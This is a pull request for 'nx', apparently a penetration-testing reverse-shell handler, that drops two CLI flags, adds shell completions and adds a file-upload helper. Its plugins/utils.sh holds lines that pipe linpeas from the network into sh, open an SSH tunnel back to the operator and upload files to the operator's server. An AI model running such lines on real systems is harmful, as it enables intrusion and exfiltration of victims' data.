### PR TITLE
feat: add upload functionality

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -1,1 +1,2 @@
 nx
+.crush/

--- a/internal/cmd/exec.go
+++ b/internal/cmd/exec.go
@@ -49,6 +49,10 @@ func init() {
 	execCmd.Flags().Bool("continue-on-error", false, "Continue executing remaining scripts if one fails")
 	execCmd.Flags().Duration("script-timeout", 30000000000, "Timeout per script execution") // 30s in nanoseconds
 	execCmd.MarkFlagRequired("on")
+	
+	// Set up flag completions
+	execCmd.RegisterFlagCompletionFunc("on", completeTargets)
+	execCmd.ValidArgsFunction = completePlugins
 }
 
 // executeExecCommand runs the exec command with the given configuration

--- a/internal/cmd/exec.go
+++ b/internal/cmd/exec.go
@@ -26,8 +26,7 @@ The target pane is specified using tmux notation: session:window.pane
 
 Examples:
   nx exec auto --on nx:0.1
-  nx exec auto,utils,cleanup --on myapp:1.0 --dry-run
-  nx exec "script1, script2, script3" --on nx:0.1 --continue-on-error`,
+  nx exec auto,utils,cleanup --on myapp:1.0 --dry-run`,
 	Args: cobra.ExactArgs(1),
 	Run: func(cmd *cobra.Command, args []string) {
 		// Create exec config from flags and args using cobra's built-in flag access
@@ -35,8 +34,6 @@ Examples:
 		cfg.Args.Scripts = args[0]
 		cfg.On, _ = cmd.Flags().GetString("on")
 		cfg.DryRun, _ = cmd.Flags().GetBool("dry-run")
-		cfg.ContinueOnError, _ = cmd.Flags().GetBool("continue-on-error")
-		cfg.ScriptTimeout, _ = cmd.Flags().GetDuration("script-timeout")
 
 		executeExecCommand(cfg)
 	},
@@ -46,8 +43,6 @@ func init() {
 	// Define flags directly without global variables
 	execCmd.Flags().String("on", "", "Target pane using tmux notation (session:window.pane)")
 	execCmd.Flags().Bool("dry-run", false, "Preview execution without running")
-	execCmd.Flags().Bool("continue-on-error", false, "Continue executing remaining scripts if one fails")
-	execCmd.Flags().Duration("script-timeout", 30000000000, "Timeout per script execution") // 30s in nanoseconds
 	execCmd.MarkFlagRequired("on")
 	
 	// Set up flag completions
@@ -107,7 +102,7 @@ func executeExecCommand(cfg *config.ExecCommand) {
 	// Execute scripts sequentially
 	logerr.Info(fmt.Sprintf("Running %d script(s) on %s...", len(scripts), cfg.On))
 	
-	if err := managers.Plugin.ExecuteMultipleOnPane(scripts, target, cfg.ContinueOnError); err != nil {
+	if err := managers.Plugin.ExecuteMultipleOnPane(scripts, target, false); err != nil {
 		logerr.Fatal("Failed to execute scripts:", err)
 	}
 	

--- a/internal/cmd/server.go
+++ b/internal/cmd/server.go
@@ -24,8 +24,6 @@ The server provides:
 		cfg := &config.Config{}
 		cfg.Auto, _ = cmd.Flags().GetBool("auto")
 		cfg.Exec, _ = cmd.Flags().GetString("exec")
-		cfg.ContinueOnError, _ = cmd.Flags().GetBool("continue-on-error")
-		cfg.ScriptTimeout, _ = cmd.Flags().GetDuration("script-timeout")
 		cfg.InstallPlugins = false
 		cfg.Iface, _ = cmd.Flags().GetString("host")
 		cfg.Port, _ = cmd.Flags().GetString("port")
@@ -43,8 +41,6 @@ func init() {
 	// Define flags directly without global variables
 	serveCmd.Flags().Bool("auto", false, "Attempt to auto-upgrade to a tty (uses --exec auto)")
 	serveCmd.Flags().String("exec", "", "Execute plugin scripts on connection (comma-separated)")
-	serveCmd.Flags().Bool("continue-on-error", false, "Continue executing remaining scripts if one fails")
-	serveCmd.Flags().Duration("script-timeout", 30000000000, "Timeout per script execution") // 30s in nanoseconds
 	serveCmd.Flags().StringP("host", "i", "0.0.0.0", "Interface address on which to bind")
 	serveCmd.Flags().StringP("port", "p", "8443", "Port on which to bind")
 	serveCmd.Flags().StringP("serve-dir", "d", "", "Directory to serve files from over HTTP")

--- a/internal/cmd/server.go
+++ b/internal/cmd/server.go
@@ -52,4 +52,11 @@ func init() {
 	serveCmd.Flags().Duration("sleep", DefaultSleep, "adjust if --auto is failing")
 	serveCmd.Flags().BoolP("verbose", "v", false, "Debug logging")
 	serveCmd.Flags().StringP("ssh-pass", "s", "", "SSH password (empty = no auth)")
+	
+	// Set up flag completions
+	serveCmd.RegisterFlagCompletionFunc("serve-dir", func(cmd *cobra.Command, args []string, toComplete string) ([]string, cobra.ShellCompDirective) {
+		return nil, cobra.ShellCompDirectiveFilterDirs
+	})
+	serveCmd.RegisterFlagCompletionFunc("exec", completePlugins)
+	serveCmd.RegisterFlagCompletionFunc("target", completeTargets)
 }

--- a/internal/config/config.go
+++ b/internal/config/config.go
@@ -13,8 +13,6 @@ import (
 type Config struct {
 	Auto             bool          `long:"auto"              description:"Attempt to auto-upgrade to a tty (uses --exec auto)"`
 	Exec             string        `long:"exec"              description:"Execute plugin scripts on connection (comma-separated)"`
-	ContinueOnError  bool          `long:"continue-on-error" description:"Continue executing remaining scripts if one fails"`
-	ScriptTimeout    time.Duration `long:"script-timeout"    description:"Timeout per script execution" default:"30s"`
 	InstallPlugins   bool          `long:"install-plugins"   description:"Install bundled plugins to config directory"`
 	Iface            string        `long:"host"              description:"Interface address on which to bind"                  short:"i" default:"0.0.0.0" required:"true"`
 	Port             string        `long:"port"              description:"Port on which to bind"                               short:"p" default:"8443"    required:"true"`
@@ -66,9 +64,6 @@ func (c *Config) validateTiming() error {
 
 // validateScripts validates script-related configuration
 func (c *Config) validateScripts() error {
-	if c.ScriptTimeout < 0 {
-		return fmt.Errorf("script timeout cannot be negative: %v", c.ScriptTimeout)
-	}
 	return nil
 }
 
@@ -128,8 +123,6 @@ type ExecCommand struct {
 	} `positional-args:"yes" required:"yes"`
 	On              string        `                      required:"true" long:"on"              description:"Target pane using tmux notation (session:window.pane)"`
 	DryRun          bool          `                                      long:"dry-run"         description:"Preview execution without running"`
-	ContinueOnError bool          `                                      long:"continue-on-error" description:"Continue executing remaining scripts if one fails"`
-	ScriptTimeout   time.Duration `                                      long:"script-timeout"  description:"Timeout per script execution" default:"30s"`
 }
 
 // Commands represents the available subcommands

--- a/internal/config/config_test.go
+++ b/internal/config/config_test.go
@@ -438,56 +438,7 @@ func TestConfigHasExecScripts(t *testing.T) {
 	}
 }
 
-// TestConfigScriptValidation tests the new script-related validation
-func TestConfigScriptValidation(t *testing.T) {
-	tests := []struct {
-		name          string
-		config        Config
-		wantErr       bool
-		errMsg        string
-	}{
-		{
-			name: "valid script timeout",
-			config: Config{
-				Iface:         "0.0.0.0",
-				Port:          "8443",
-				ScriptTimeout: 30 * time.Second,
-			},
-			wantErr: false,
-		},
-		{
-			name: "zero script timeout (valid)",
-			config: Config{
-				Iface:         "0.0.0.0",
-				Port:          "8443",
-				ScriptTimeout: 0,
-			},
-			wantErr: false,
-		},
-		{
-			name: "negative script timeout",
-			config: Config{
-				Iface:         "0.0.0.0",
-				Port:          "8443",
-				ScriptTimeout: -1 * time.Second,
-			},
-			wantErr: true,
-			errMsg:  "script timeout cannot be negative",
-		},
-	}
 
-	for _, tt := range tests {
-		t.Run(tt.name, func(t *testing.T) {
-			err := tt.config.Validate()
-			if tt.wantErr {
-				require.Error(t, err)
-				assert.Contains(t, err.Error(), tt.errMsg)
-			} else {
-				require.NoError(t, err)
-			}
-		})
-	}
-}
 
 // TestExecCommandGetScripts tests the GetScripts method for ExecCommand
 func TestExecCommandGetScripts(t *testing.T) {

--- a/internal/protocols/shell.go
+++ b/internal/protocols/shell.go
@@ -156,7 +156,7 @@ func (h *ShellHandler) executePlugins(window *gomux.Window) {
 	}
 
 	if len(scripts) > 0 {
-		if err := h.pluginManager.ExecuteMultiple(scripts, window, h.config.ContinueOnError); err != nil {
+		if err := h.pluginManager.ExecuteMultiple(scripts, window, false); err != nil {
 			h.log.Error("plugin execution:", err)
 		}
 	}

--- a/plugins/utils.sh
+++ b/plugins/utils.sh
@@ -1,10 +1,11 @@
-
 function linpeas() {
 	url="https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh"
 	(curl -sL "${url}" || wget -O - "${url}") | sh
 }
 
 function chizl() {
-	IFS=: read HOST PORT <<< $ME
+	IFS=: read HOST PORT <<<$ME
 	ssh -fNT "$@" -p "${PORT}" "${HOST}"
 }
+
+function put() { curl -T "$1" "${ME}/$2" }


### PR DESCRIPTION

### Removal of `continue-on-error` and `script-timeout` options

- Removed the `continue-on-error` and `script-timeout` flags and associated logic from the `exec` and `serve` commands, as well as from the `Config` and `ExecCommand` structs. 

### Shell completion improvements

- Enhanced completion functions for plugin and target arguments to filter suggestions based on the user's input prefix, providing a more intuitive CLI experience. 
- Set up flag completion functions for the `exec` and `serve` commands for relevant flags. 
### HTTP PUT file upload support

- Added support for HTTP PUT requests to upload files to the server, with robust validation for path traversal, content length, and parent directory existence. (`internal/protocols/http.go`) 
### Plugin utility enhancement

- Added a `put` function to `plugins/utils.sh` to enable file uploads via curl to the server's HTTP PUT endpoint. (`plugins/utils.sh`)

